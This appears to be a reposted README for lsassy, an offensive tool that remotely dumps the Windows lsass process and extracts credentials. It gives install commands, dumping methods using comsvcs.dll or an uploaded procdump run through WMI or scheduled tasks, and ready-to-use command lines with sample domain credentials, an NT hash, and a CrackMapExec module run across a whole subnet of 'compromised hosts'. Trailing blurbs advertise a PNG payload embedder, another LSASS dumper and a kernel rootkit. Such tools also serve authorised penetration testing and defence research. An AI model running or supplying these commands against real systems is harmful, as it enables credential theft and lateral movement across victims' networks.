Lsassy is a tool used to extract credentials from lsass remotely. This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.
Chapters | Description |
---|---|
Requirements | Requirements to install lsassy from source |
Installation | Installation commands from pip or from source |
Basic Usage | Command line template for standalone version |
Advanced Usage | Advanced usage (Dumping methods, execution methods, …) |
CrackMapExec Module | Link to CrackMapExec module included in this repository |
Examples | Command line examples for standalone and CME module |
Issues | Read this before creating an issue |
Acknowledgments | Kudos to these people and tools |
Contributors | People contributing to this tool |
Requirements
Installation
From pip
python3.7 -m pip install lsassy
From sources
python3.7 setup.py install
Basic Usage
lsassy [–hashes [LM:]NT] [<domain/]<user>[:<password>]@<target>
Also Read – Hakrawler : Discovery Of Endpoints & Assets Within A Web Application
Advanced
Dumping Methods
This tool can dump lsass in different ways.
Dumping methods (-m
or --method
)
comsvcs.dll method
This method only uses built-in Windows files to extract remote credentials. It uses minidump function from comsvcs.dll to dump lsass process.
This method can only be used when context has SeDebugPrivilege. This privilege is either in Powershell local admin context, or cmd.exe SYSTEM context.
Two execution methods can be used.
Procdump method
This method uploads procdump.exe from SysInternals to dump lsass process. It will first try to execute procdump using WMI, and if it fails it will create a remote task, execute it and delete it.
Examples
lsassy [–hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 0 -p /path/to/procdump.exe
lsassy [–hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 1 lsassy [–hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 2 -p /path/to/procdump.exe
lsassy [–hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 3 lsassy [–hashes [LM:]NT] [<domain>/]<user>[:<password>]@<target> -m 4
Remote parsing only
lsassy can parse an already dumped lsass process.
lsassy [–hashes [LM:]NT] –dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>
CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts
CrackMapExec module is in cme
folder : CME Module
Examples
lsassy
# RunDLL Method lsassy adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# Procdump Method lsassy -m 2 -p /tmp/procdump.exe adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# Remote parsing only lsassy –dumppath C$/Windows/Temp/lsass.dmp adsec.local/jsnow:Winter_is_coming@dc01.adsec.local
# NT Hash Authentication lsassy –hashes 952c28bd2fd728898411b301475009b7 Administrator@desktop01.adsec.local
CME Module
crackmapexec smb 10.0.0.0/24 -d adsec.local -u Administrator -p Passw0rd -M lsassy -o BLOODHOUND=True NEO4JPASS=bloodhound
ChangeLog
Issues
If you find an issue with this tool (that’s very plausible !), please
-d
debug flag--verbose
flag bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…